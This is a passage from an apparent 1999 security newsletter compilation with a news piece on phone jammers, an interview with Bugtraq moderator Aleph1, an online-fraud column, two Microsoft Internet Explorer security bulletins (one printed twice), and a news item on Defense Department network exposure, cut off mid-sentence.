analyst with Ovum, a Sydney market research firm. "But there's definitely a
market for this as people become sick and tired of the disruptions caused
by mobile phones."


But Nourouzi says mobile-phone spectrum is like a public space that
individuals shouldn't be able to shut down on a whim. He likened it to
blocking a highway because you object to vehicle noise. He believes other
solutions will be found to the mobile phone nuisance. But for now, he
concedes, "jammers have gotten people thinking."


In Great Britain, some commuter and inter-city trains have special cars
where the phones are forbidden. They bear a metallic coating that prevents
mobile-phone transmissions -- providing some respite for train riders
wanting peace and quiet.


In the United States, mobile jammers are banned by the Federal
Communications Commission, which prohibits intentional jamming of radio
signals.


Japan's Ministry of Post and Telecommunications, however, is allowing
jammers to be tested in theaters, concert halls, cinemas, and lecture
halls, where silence is supposed to be golden.


Netline defends the jammer, saying it could prove useful in places like
hospitals or planes, where a mobile phone might pose risks to medical
equipment or flight navigation gear. Neufeld also says jammers should be
allowed on private property so homeowners can enjoy a quiet zone, safe from
the mobile's endless intrusions.


In the end, Neufeld says the jammer's hash may have to be settled in court,
or through new legislation.


"Cellular phone operators encourage people to use their cellular phones at
all times and all places without discretion," Neufeld says. "We believe
many countries are rapidly realizing that there is a need to regulate this
issue in a legal manner."


@HWA

27.0 Interview with Aleph1 creator of BUGTRAQ
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From: http://www.networkcommand.com/one.html

If someone just dropped a bomb on the security industry,
if MS has put out a press release to quell users fears,
you can usually trace the initial message back somewhere.

Bugtraq is the most often the source.

Aleph1 is the moderator of Bugtraq and shares his views about the world,
security, opensource and quantum cryptography.

You can read bugtraq at geek-girl.

So, let's get started with the standard information...

[taken from the Bugtraq FAQ]


0.1 What is BugTraq?

This list is for *detailed* discussion of computer security holes: what
they are, how to exploit, and what to do to fix them.

This list is not intended to be about cracking systems or exploiting
their vulnerabilities. It is about defining, recognizing, and preventing
use of security holes and risks.

0.1 What is appropriate content?

Please follow the below guidelines on what kind of information
should be posted to the Bugtraq list:

o Information on Unix related security holes/backdoors (past and present)
o Exploit programs, scripts or detailed processes about the above
o Patches, workarounds, fixes
o Announcements, advisories or warnings
o Ideas, future plans or current works dealing with Unix security
o Information material regarding vendor contacts and procedures
o Individual experiences in dealing with above vendors or
security organizations
o Incident advisories or informational reporting


EOF

There has been some talk on other mailing lists of switching to a paid
subscription service -- gotta eat somehow. Bugtraq has always been free,
do you have a day job?

I assume you are talking about NTBUGTRAQ. Yes, I have a day job although
it tends to change every year or so. I've also been lucky that I've always
managed to have enough free time to manage the list, which normally
takes about one or two hours a day. But let me assure you that BUGTRAQ
will always, so long as it is within my power, be free. BUGTRAQ
is about community and the free exchange of information. BUGTRAQ is
what it is because of its subscribers. Seems like a rather fast way to
kill the list would be to tell people they have to pay for the privilege
to read their own posts.

What is the current number of list subscribers on bugtraq now?

Twenty seven thousand five hundred. Give or take a few.

Sometimes do people send you email just thanking you for what the list
provides? Yesterday I thought, "What if bugtraq just went away?? What
would we do?" There will be a time when either bugtraq or the open source
movement will save your ass if it hasn't happened already.

Sometimes. Mostly after an "Administrivia" message. There have been people
that have joined and don't even realize there is a moderator until one
of those posts. It feels nice when people let you know they think you
are doing a good job, but as with any position that involves some public
visibility there will always be some group that thinks otherwise. Over
the years I've learned to run things as I like and not to worry about
what people think. If they like how things are being run the list will
prosper. If they don't then they will move on and the list will disappear.


What was the first computer you were ever exposed to?

Compared to some people in this industry/community I would consider
myself a late comer to the computer world. I believe my first contact
with computers was during middle school where I learned programming
using Logo on an Apple IIe. For several years after that I had no
contact with computers. Next I took a Lotus 123 and Dbase IV class
using IBM PCs. I also obtained access through family and friends
to a few macs. The first computer I owned was an Apple II GS.
At the time I had little access to any software other than that
which came with the machine so I learned Apple BASIC.

I truly become involved with computers when I moved to go to college.
I brought a 466 DX 50, took some college computer classes and learned
about unix. About this same time I become involved with the hacker
underground.

Did you ever get involved with the BBS scene?

Yes but only to a limited degree. At some point I had become interested
in the hacker phenomenon. I had seen the movie War Games some years before
so it might have been the seed that sparked my curiosity. I had done some
research at my college's library and come up with several news and magazine
articles, including the infamous Esquire article that made Captain Crunch
famous. I also read the books Cyberpunk and Hackers. Somewhere I came
across a copy of 2600 and brought it.

This issue of 2600 had, what else, plans on how to make a red box out of
a radio shack tone dialer. I decided to try to build the device so I went
down to my local Radio Shack store to buy the part. In the store also
buying some parts where to rather curious characters. I asked the attendant
for the crystal and some other part. In the mean time the two other guys
paid and left the store.

When I left the store I found them waiting for me. They asked me what I
was building and I replied it was a red box. I asked what they where
building and they said a black box. One of them was Intrepid Traveler.
Intrepid gave me the number to a local board. The rather famous Lunatic
Labs.

It was that encounter and going to the LA 2600 meetings that really got me
started in this whole business.

After calling LunaLabs for the first time I obtained a list of several other
boards. For that whole first month I called some other of the better known
non-local boards in the country. Daemon Roach Underground, UPT, and some
others. After my phone bill that month reached several hundred dollars I
decided to stop calling long distance boards. I hanged out at LunaLabs
and some other local boards but then moved on. I had Net access!

What platform/s do you prefer to work with?
Why?

Linux and Windows NT. Linux for the simple fact that it supports more
of the hardware I want to use and more applications. Windows NT I use
mostly for applications. Truth is I hate OS wars. They are the dumbest
thing in the world. Each OS has its strengths and weaknesses. Use the
right tool for the right job, or use the tool you feel the more comfortable
with.

There seem to be two camps in the security industry right now. There's one
camp that thinks they are secure or close and the other that is just
waiting for the killer app and understands the damage it could cause.
That melissa virus really freaked people out, but if you know anything
about security you know melissa was nothing compared what could be coming.
Do you think the second camp is right, or alarmists?

If there is any camp that thinks they are secure then I must have missed them.
But I don't think we are doomed either. For the longest time I wondered why
no one had written a new worm. After all its not really that difficult.
But the reality is that even with Microsoft dominance of the OS market
we live in a very heterogeneous world. Writing a worm that can infect
more than one OS is more work. Writing a worm that can infect all OS and
different version of the same OS is a very large task. Even the DNS ADM worm
floating around didn't do much. To many flavors to take care of them all.

Even by all accounts the Internet Worm didn't really spread to a majority
of the Net back then. The thing could only really infect to flavors of UNIX.
Yet even if we are not looking at a doomsday scenario a good number of
people could be inconvenience by a large enough attack. Melissa did not
infect anywhere near a majority of net user. Still it was a large number.

Should that guy who wrote it be held responsible, or microsoft for writing
insecure software, or the end user who runs it because they are ignorant?

I don't believe the guy who wrote it should be held any more responsible than
than someone who publishes bomb recipes (or cookie recipes for that matter).
The person that released the virus to the wild should be held accountable
although the fact that it wasn't malicious should be taken into account.

Microsoft should be held accountable as well. They will of course reply that
they simply add features because customers ask for it. Yet when you reach
the monopoly Microsoft has reached you have the obligation to do what is
best to the consumer, even if it means telling them they can't have some
features.

Finally, the consumer should be held responsible as well. They continue to
base their purchasing decisions solely on an applications feature set
without taking into account security implications.

Do you feel the quality of virii and hacks are going to increase as we
approach y2k and move past it?

The number of knowledgable people will increase so the number of quality
virii/hacks will increase as well. But the addition of the "hacker" figure
to the pop culture pantheon of rebels will also increase the number of
clueless people that call themselves hackers, therefore the percentage
of quality virii/hacks will decrease.

Do you think we are going to see an increase in foreign governments using
the internet to harm their enemies?

We will see an increase of intelligence gathering activities by government
entities but I doubt it would develop into "net war". After all their
computers are just as vulnerable as ours. I guess we go back to the
doctrine of mutually assured destruction. Of course this assumes their
society is as dependent on the net as ours is.

Although I feel like I have more access to information now (news reports
from alternate sources, video of human rights violations, etc.) I still
feel like I'm missing the same piece of the puzzle, if you know what I
mean. Take China for instance. Their current government has created an
Orwellian 1984 -- and proved that history repeats. They have created the
Great Firewall of China and are executing people for acts conducted over
the net. Singapore is proxied -- the whole country. I can't even imagine
what that would be like. Do you think the oppression can continue, or...

I think the Net is a wonderful tool to bring down such regimes. Before it
the TV had a similar impact. It had the effect of introducing foreign ideas
that are difficult to control into those environments. I think the problem
you are seeing is that you are excepting change to occur overnight. That
is very unlikely. I takes at least a whole generation for the young people
that embrace these ideas to come into power. You also have to understand that
those societies are not as wired as ours. The people with net access in those
areas tend to be either the elite, the ones in power or the rich. Not exactly
those that you want to reach. I see things moving in the right direction
but it will take time.

Do you have any info on the cDc's Chinese emailer app? I guess it returns
censored web sites via email.

No. Although it sounds like a wonderful tool.

Do you believe Open Source is the only way to be secure?

Theoretically yes. In practice it can actually be a hindrance. The common
example is comparing the number of Linux exploits to say Solaris. The are
many more Linux exploits among other things because people can read the
source. Now in theory since we have the source everyone should have audited
it and fixed any problems, but how many people actually do that? In theory
you can also find vulnerabilities in a closed source system, but in practice
its more difficult. So security through obscurity can help, its just that you
should never depend on it.

Does this mean we should give up on open source? No. It just means we have
to strive at doing better auditing of it ala OpenBSD or the Linux Auditing
Project.

Marcus Ranum has some very good ideas on how open source can actually burn
you.

That was an interesting discussion about this issue on the firewall mailing
list with regards of the availability of the Gauntlet firewall source code.
The source code has been available to any customer for years (until recently),
but how many people actually bothered to look at it and send in bug reports?
Not many.

Everyone want to live in an utopia. To bad we live in a practical world.

Know anything about Quantum Cryptography?
I found some source code for a simulation...

Just some basic concepts. Nothing I would want do describe for fear of
talking about something I don't really know about ;)

What's up with your web site underground.org? It's a pretty picture but
everyone wants to know if there is some skunk works going on back there...

There is nothing there but the picture. Underground was a fairly popular
security archive in the past. Over time it grew to the point it became
difficult to maintain and I let it rot. At some point in the future
a hard drive crash took the web server down. All the information in
the site was so dated that I decided to keep it down. I have been working on
a new version of the site for a very long time now. I can't say when it
will be ready. It's a lot of work and not very fun at that.

Who is Jennifer Myers?

The person that runs that defacto BugTraq archives at geek-girl.com.
She's had no formal relationship with BugTraq.

The Bugtraq.

@HWA

28.0 World Wide Wangle cmp net techweb article (FUD)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


May 01, 1999, Issue: 1005
Section: Analysis

World Wide Wangle
Mike Elgan

Online auction scams, pirate software and e-mail cons are ripping off legions of
innocent Web surfers. Hucksters have always done just as well online as they
do offline, but lately, Internet fraud has spiraled totally out of control. Investor
watchdog groups estimate that Internet stock fraud now costs would-be
investors more than $1 million an hour. And it's not just the newbie consumers
being suckered-some of the biggest victims are large companies and
sophisticated users who are quite comfortable buying online.

Of course, many online auction, investment and shopping sites are legitimate and
recommended.

But as the good sites make us more comfortable online, the bad ones take
advantage of that comfort level to rip us off.

The knee-jerk government approach is to talk tough and write new laws that
would lock up the crooks. For example, the state of Virginia recently passed a
law that makes spam illegal.

About half the states already have or are considering similar laws. But Virginia
matters because it's the home of America Online-the spam capital of the
Internet-and also of mega-ISPs UUnet and PSINet. Though Virginia's law
covers all spam, it specifically targets fraud and dirty e-mail tricks, such as the
illegal use of domain names.

Sure, Virginia will catch some crooks and nab a few headlines. But that won't
stop or even slow the rampant growth of spam and e-mail fraud-for the
denizens of Virginia or anyone else. Why? The Internet is fundamentally
ungovernable. How do you catch a crook you can't find?

The easiest-to-catch Net criminals are minors. British authorities recently
announced that the mastermind behind a major software bootlegging operation
plaguing the nation was an 11-year-old boy working from his bedroom in
Sunderland.

Older and more sophisticated scam artists increasingly use hacker tricks to
cover their tracks, or move

  
offshore, or both. International organized crime
groups, from Hong Kong Triads to the Russian Mafia, have suddenly discovered
Internet fraud. How will the state of Virginia-or even the federal
government-arrest Internet thieves operating anonymously from Costa Rica or
North Korea?

Worse, laws intended to catch crooks will reduce the value of the Net. The only
way to enforce these laws is more government snooping, fewer individual
freedoms and products that keep tabs on your Web whereabouts.

The best way to stop Internet crime is education. Internet users must learn to be
both savvy and cynical to safely surf the Web. State agencies and the federal
government should be boosting computer and Internet education for
schoolchildren, parents and businesses, instead of relying on tough talk and
toothless laws.

The bottom line is that we all need to start using common sense online. Some
good rules are already apparent: Don't give your credit card information to a
company you've never heard of. Use software to blast spam before you even
open it. Be suspicious of fads like online auctions, pyramid schemes and "Billy
needs a new spleen" e-mail. This all sounds suspiciously like the same kind of
common sense you'd apply offline, but it's a little harder to do on the
instant-gratification Internet.

Have you been ripped off online yet? If so, I'd like to hear your story:
mike@elgan.com.

Copyright ® 1999 CMP Media Inc.

@HWA

29.0 Microsoft DHTML patch advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Microsoft Security Bulletin (MS99-011)
--------------------------------------

Patch Available for "DHTML Edit" Vulnerability

Originally Posted: April 21, 1999

Summary
=======
Microsoft has released a patch that eliminates a vulnerability in an ActiveX
control that is distributed in Internet Explorer 5 and downloadable for
Internet Explorer 4.0. The vulnerability could allow a malicious web site
operator to read information that a user had loaded into the control, and it
also could allow files with known names to be copied from the user's local
hard drive.

A fully supported patch is available to eliminate this vulnerability and
Microsoft recommends that affected customers download and install it, if
appropriate.

Issue
=====
The DHTML Edit control is an ActiveX control that is distributed with
Internet Explorer 5 and can be downloaded for use in Internet Explorer 4.0.
The control enables users to edit HTML text and see a faithful rendition of
how the text would look in the browser. There are two versions of the
control: a more powerful version that cannot be invoked by a web site
because it includes file access and other features, and a "safe for
scripting" version that has restricted functionality and is intended for use
by web sites.

The root cause of the vulnerability lies in the fact that a web site that
hosts the "safe for scripting" version of the control is able to upload any
data entered into the control. A malicious web site operator could trick a
user into entering sensitive data into a DHTML Edit control hosted on a web
page from the operator's site, and then upload the data. In addition, if the
malicious web site operator knows the name of a file on the user's local
drive, it is possible for the operator to programmatically load the file
into the control and then upload it.

The patch works by allowing a web site to load data from the control only if
it is in the site's domain. While there are no reports of customers being
adversely affected by this vulnerability, Microsoft is proactively releasing
this patch to allow customers to take appropriate action to protect
themselves against it.

Affected Software Versions
==========================
- Microsoft Internet Explorer 5 on Windows 95, Windows 98, and
Windows NT 4.0. Internet Explorer 5 on other platforms is
not affected.
- Microsoft Internet Explorer 4.0 on Windows 95, Windows 98 and
the x86 version of Windows NT 4.0. Internet Explorer 4.0 on
other platforms, including the Alpha version of Windows NT 4.0,
is not affected.

Note: The DHTML Edit control is included by default in Internet Explorer 5.
It is not included by default in Internet Explorer 4.0, but can be
downloaded and installed. Internet Explorer 4.0 customers who are unsure
whether they have installed the control should see What Customers Should Do.


What Microsoft is Doing
=======================
Microsoft has released patches that fix the problem identified. The patches
are available for download from the sites listed below in What Customers
Should Do.

Microsoft also has sent this security bulletin to customers
subscribing to the Microsoft Product Security Notification Service.
See http://www.microsoft.com/security/services/bulletin.asp for
more information about this free customer service.

Microsoft has published the following Knowledge Base (KB) article on this
issue:
- Microsoft Knowledge Base (KB) article Q226326,
Update Available for 'DHTML Edit' Security Issue,
http://support.microsoft.com/support/kb/articles/q226/3/26.asp.
(Note: It might take 24 hours from the original posting of this
bulletin for the KB article to be visible in the Web-based
Knowledge Base.)

What Customers Should Do
========================
Microsoft highly recommends that customers determine whether they are
potentially affected by the vulnerability:
- All copies of Internet Explorer 5 contain the DHTML Edit
control, so all Internet Explorer 5 customers are potentially
affected by the vulnerability.
- The only Internet Explorer 4.0 users who are potentially
affected by the vulnerability are those who have downloaded
and installed the DHTML Edit control. If this has been done,
the file dhtmled.ocx will be present on the hard drive. By
default, this file will be stored in the folder
C:\Program Files\Common Files\Microsoft Shared\Triedit\.

Customers who are potentially affected by the vulnerability should
evaluate the degree of risk that this vulnerability poses to their
systems and determine whether to download and install the patch.
The patch can be found at
http://www.microsoft.com/windows/ie/security/dhtml_edit.asp.

More Information
================
Please see the following references for more information related to this
issue.
- Microsoft Security Bulletin MS99-011,
Patch Available for DHTML Edit Vulnerability.
(The Web-posted version of this bulletin),
http://www.microsoft.com/security/bulletins/ms99-011.asp.
- Microsoft Knowledge Base (KB) article Q226326,
Update Available for 'DHTML Edit' Security Issue,
http://support.microsoft.com/support/kb/articles/q226/3/26.asp.
(Note: It might take 24 hours from the original posting of
this bulletin for the KB article to be visible in the Web-based
Knowledge Base.)

Obtaining Support on this Issue
===============================
If you require technical assistance with this issue, please
contact Microsoft Technical Support. For information on contacting
Microsoft Technical Support, please see
http://support.microsoft.com/support/contact/default.asp.

Acknowledgments
===============
Microsoft acknowledges Juan Carlos Cuartango of Spain for
discovering this vulnerability and reporting it to us.

Revisions
=========
- April 21, 1999: Bulletin Created.


For additional security-related information about Microsoft products, please
visit http://www.microsoft.com/security
--------------------------------------------------------------------

THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS"
WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER
EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS
SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN
IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR
LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE
FOREGOING LIMITATION MAY NOT APPLY.

(c) 1999 Microsoft Corporation. All rights reserved.

*******************************************************************
You have received this e-mail bulletin as a result of your registration
to the Microsoft Product Security Notification Service. You may
unsubscribe from this e-mail notification service at any time by sending
an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
The subject line and message body are not used in processing the request,
and can be anything you like.

For more information on the Microsoft Security Notification Service
please visit http://www.microsoft.com/security/bulletin.htm. For
security-related information about Microsoft products, please visit the
Microsoft Security Advisor web site at http://www.microsoft.com/security.Microsoft Security Bulletin (MS99-011)
--------------------------------------

Patch Available for "DHTML Edit" Vulnerability

Originally Posted: April 21, 1999

Summary
=======
Microsoft has released a patch that eliminates a vulnerability in an ActiveX
control that is distributed in Internet Explorer 5 and downloadable for
Internet Explorer 4.0. The vulnerability could allow a malicious web site
operator to read information that a user had loaded into the control, and it
also could allow files with known names to be copied from the user's local
hard drive.

A fully supported patch is available to eliminate this vulnerability and
Microsoft recommends that affected customers download and install it, if
appropriate.

Issue
=====
The DHTML Edit control is an ActiveX control that is distributed with
Internet Explorer 5 and can be downloaded for use in Internet Explorer 4.0.
The control enables users to edit HTML text and see a faithful rendition of
how the text would look in the browser. There are two versions of the
control: a more powerful version that cannot be invoked by a web site
because it includes file access and other features, and a "safe for
scripting" version that has restricted functionality and is intended for use
by web sites.

The root cause of the vulnerability lies in the fact that a web site that
hosts the "safe for scripting" version of the control is able to upload any
data entered into the control. A malicious web site operator could trick a
user into entering sensitive data into a DHTML Edit control hosted on a web
page from the operator's site, and then upload the data. In addition, if the
malicious web site operator knows the name of a file on the user's local
drive, it is possible for the operator to programmatically load the file
into the control and then upload it.

The patch works by allowing a web site to load data from the control only if
it is in the site's domain. While there are no reports of customers being
adversely affected by this vulnerability, Microsoft is proactively releasing
this patch to allow customers to take appropriate action to protect
themselves against it.

Affected Software Versions
==========================
- Microsoft Internet Explorer 5 on Windows 95, Windows 98, and
Windows NT 4.0. Internet Explorer 5 on other platforms is
not affected.
- Microsoft Internet Explorer 4.0 on Windows 95, Windows 98 and
the x86 version of Windows NT 4.0. Internet Explorer 4.0 on
other platforms, including the Alpha version of Windows NT 4.0,
is not affected.

Note: The DHTML Edit control is included by default in Internet Explorer 5.
It is not included by default in Internet Explorer 4.0, but can be
downloaded and installed. Internet Explorer 4.0 customers who are unsure
whether they have installed the control should see What Customers Should Do.


What Microsoft is Doing
=======================
Microsoft has released patches that fix the problem identified. The patches
are available for download from the sites listed below in What Customers
Should Do.

Microsoft also has sent this security bulletin to customers
subscribing to the Microsoft Product Security Notification Service.
See http://www.microsoft.com/security/services/bulletin.asp for
more information about this free customer service.

Microsoft has published the following Knowledge Base (KB) article on this
issue:
- Microsoft Knowledge Base (KB) article Q226326,
Update Available for 'DHTML Edit' Security Issue,
http://support.microsoft.com/support/kb/articles/q226/3/26.asp.
(Note: It might take 24 hours from the original posting of this
bulletin for the KB article to be visible in the Web-based
Knowledge Base.)

What Customers Should Do
========================
Microsoft highly recommends that customers determine whether they are
potentially affected by the vulnerability:
- All copies of Internet Explorer 5 contain the DHTML Edit
control, so all Internet Explorer 5 customers are potentially
affected by the vulnerability.
- The only Internet Explorer 4.0 users who are potentially
affected by the vulnerability are those who have downloaded
and installed the DHTML Edit control. If this has been done,
the file dhtmled.ocx will be present on the hard drive. By
default, this file will be stored in the folder
C:\Program Files\Common Files\Microsoft Shared\Triedit\.

Customers who are potentially affected by the vulnerability should
evaluate the degree of risk that this vulnerability poses to their
systems and determine whether to download and install the patch.
The patch can be found at
http://www.microsoft.com/windows/ie/security/dhtml_edit.asp.

More Information
================
Please see the following references for more information related to this
issue.
- Microsoft Security Bulletin MS99-011,
Patch Available for DHTML Edit Vulnerability.
(The Web-posted version of this bulletin),
http://www.microsoft.com/security/bulletins/ms99-011.asp.
- Microsoft Knowledge Base (KB) article Q226326,
Update Available for 'DHTML Edit' Security Issue,
http://support.microsoft.com/support/kb/articles/q226/3/26.asp.
(Note: It might take 24 hours from the original posting of
this bulletin for the KB article to be visible in the Web-based
Knowledge Base.)

Obtaining Support on this Issue
===============================
If you require technical assistance with this issue, please
contact Microsoft Technical Support. For information on contacting
Microsoft Technical Support, please see
http://support.microsoft.com/support/contact/default.asp.

Acknowledgments
===============
Microsoft acknowledges Juan Carlos Cuartango of Spain for
discovering this vulnerability and reporting it to us.

Revisions
=========
- April 21, 1999: Bulletin Created.


For additional security-related information about Microsoft products, please
visit http://www.microsoft.com/security
--------------------------------------------------------------------

THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS"
WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER
EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS
SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN
IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR
LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE
FOREGOING LIMITATION MAY NOT APPLY.

(c) 1999 Microsoft Corporation. All rights reserved.

*******************************************************************
You have received this e-mail bulletin as a result of your registration
to the Microsoft Product Security Notification Service. You may
unsubscribe from this e-mail notification service at any time by sending
an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
The subject line and message body are not used in processing the request,
and can be anything you like.

For more information on the Microsoft Security Notification Service
please visit http://www.microsoft.com/security/bulletin.htm. For
security-related information about Microsoft products, please visit the
Microsoft Security Advisor web site at http://www.microsoft.com/security.

@HWA

30.0 Microsoft MSIE4 and 5 vulnerabilities patch advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Microsoft Security Bulletin (MS99-012)
--------------------------------------

MSHTML Update Available for Internet Explorer

Originally Posted: April 21, 1999

Summary
=======
Microsoft has released an updated version of a component of Internet
Explorer 4.0 and 5. The updated version eliminates three security
vulnerabilities described below. It is fully supported and Microsoft
recommends that affected customers download and install it, if appropriate.

Issue
=====
MSHTML.DLL is the parsing engine for HTML in Internet Explorer. The
vulnerabilities that are eliminated by the update are not related to each
other except for the fact that all reside within the parsing engine.
- The first vulnerability is a privacy issue involving
the processing of the "IMG SRC" tag in HTML files. This tag
identifies and loads image sources - image files that are
to be displayed as part of a web page. The vulnerability
results because the tag can be used to point to files of any
type, rather than only image files, after which point the
document object model methods can be used to determine information
about them. A malicious web site operator could use this vulnerability
to determine the size and other information about files on the
computer of a visiting user. It would not allow files to be read or
changed, and the malicious web site operator would need to know the
name of each file.
- The second vulnerability is a new variant of a previously-identified
cross-frame security vulnerability. A particular malformed URL could
be used to execute scripts in the security context of a different
domain. This could allow a malicious web site operator to execute a
script on the web site, and gain privileges on visiting users' machines
that are normally granted only to their trusted sites.
- The third vulnerability affects only Internet Explorer 5.0, and is a
new variant of a previously-identified untrusted scripted paste
vulnerability. The vulnerability would allow a malicious web site
operator to create a particular type of web page control and paste
into it the contents of a visiting user's clipboard.

While there are no reports of customers being adversely affected by any of
these vulnerabilities, Microsoft is proactively releasing an updated version
of MSHTML.DLL to allow customers to take appropriate action to protect
themselves against it.

Affected Software Versions
==========================
- Internet Explorer 4.0 and 5 on Windows 95, Windows 98
and Windows NT 4.0.

What Microsoft is Doing
=======================
Microsoft has released patches that fix the problem identified. The patches
are available for download from the sites listed below in What Customers
Should Do.

Microsoft also has sent this security bulletin to customers
subscribing to the Microsoft Product Security Notification Service.
See http://www.microsoft.com/security/services/bulletin.asp for
more information about this free customer service.

Microsoft has published the following Knowledge Base (KB) article on this
issue:
- Microsoft Knowledge Base (KB) article Q226326,
Update Available for MSHTML Security Issues in Internet Explorer,
http://support.microsoft.com/support/kb/articles/q226/3/26.asp.
(Note: It might take 24 hours from the original posting of this
bulletin for the KB article to be visible in the Web-based Knowledge
Base.)

What Customers Should Do
========================
Microsoft highly recommends that customers evaluate the degree of
risk that this vulnerability poses to their systems and determine
whether to download and install the patch. The patch can be found at
http://www.microsoft.com/windows/ie/security/mshtml.asp.

More Information
================
Please see the following references for more information related to this
issue.
- Microsoft Security Bulletin MS99-012,
MSHTML Update Available for Internet Explorer (The Web-posted
version of this bulletin),
http://www.microsoft.com/security/bulletins/ms99-012.asp.
- Microsoft Knowledge Base (KB) article Q226326,
Update Available for MSHTML Security Issues in Internet Explorer,
http://support.microsoft.com/support/kb/articles/q226/3/26.asp.
- Microsoft Security Bulletin MS98-013,
Fix available for Internet Explorer Cross Frame Navigate Vulnerability,
http://www.microsoft.com/security/bulletins/ms98-013.asp
- Microsoft Security Bulletin MS98-015,
Update available for "Untrusted Scripted Paste" Issue in Microsoft
Internet Explorer 4.01,
http://www.microsoft.com/security/bulletins/ms98-015.asp

Obtaining Support on this Issue
===============================
If you require technical assistance with this issue, please contact
Microsoft Technical Support. For information on contacting Microsoft
Technical Support, please see
http://support.microsoft.com/support/contact/default.asp.

Acknowledgments
===============
Microsoft acknowledges Richard M. Smith, President, Phar Lap Software, Inc.,
for discovering the IMG SRC vulnerability, and Georgi Guninski from
TechnoLogica Ltd., Bulgaria, for discovering the cross-frame and untrusted
scripted paste vulnerabilities.

Revisions
=========
- April 21, 1999: Bulletin Created.


For additional security-related information about Microsoft products, please
visit http://www.microsoft.com/security
----------------------------------------------------------------------

THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS"
WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER
EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS
SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN
IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR
LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE
FOREGOING LIMITATION MAY NOT APPLY.

(c) 1999 Microsoft Corporation. All rights reserved.

*******************************************************************
You have received this e-mail bulletin as a result of your registration
to the Microsoft Product Security Notification Service. You may
unsubscribe from this e-mail notification service at any time by sending
an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
The subject line and message body are not used in processing the request,
and can be anything you like.

For more information on the Microsoft Security Notification Service
please visit http://www.microsoft.com/security/bulletin.htm. For
security-related information about Microsoft products, please visit the
Microsoft Security Advisor web site at http://www.microsoft.com/security.

@HWA

31.0 [ISN] DoD considers pulling the plug on the net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Forwarded From: Erik Parker <netmask@303.org>


http://www.fcw.com:80/pubs/fcw/1999/0419/fcw-newsdod-4-19-99.html


Hammered by relentless hacker attacks against its unclassified network for
years, the Defense Department may back away from using the Internet, which
it invented, in favor of relying on intranet enclaves, according to a top
Army official.

Lt. Gen. William Campbell, Army director of information systems for
command, control and communications, who last year ordered all Army World
Wide Web sites shut down pending a security review of their contents, said
last week that all military networks connected to the Internet are
"inherently vulnerable.... We don't have a prayer or a hope of defending
ourselves unless we move large portions of the '.mil' [domain] onto a
protected network" such as an intranet not connected to the Internet.

Campbell, speaking at a conference sponsored by the Association of the
United States Army and the Association of Old Crows, suggested that DOD
move its electronic commerce networks and publicly accessible Web sites to
the ".com" domain, which is used by businesses.

The vulnerability of DOD networks has captured the attention of senior
members of all four armed services as well as DOD, Campbell said. "We
would be remiss if we left these network connections out there," he said.
"We need sufficient protection so no one can get into our networks and
damage the defense of the United States."

To handle its most sensitive traffic, DOD uses its Secret Internet
Protocol Router Network, an intranet-like global network. Much of DOD's
day-to-day business -- including logistics, personnel and pay -- is
conducted on the Non-Classified Internet Protocol Router Network, which is
connected to the Internet and looms as a DOD electronic Achilles' heel,
Campbell said.

"The openness of these networks makes us vulnerable to attacks by a
hostile agent," Campbell said. "Vulnerabilities are of such a magnitude
that to ignore them would be a dereliction of duty."

Detected hacker attacks against DOD worldwide unclassified networks occur
at a rate of 250,000 a year -- plus an untold number of undetected
attacks, according to Air Force Maj. Gen. John "Soup" Campbell, director
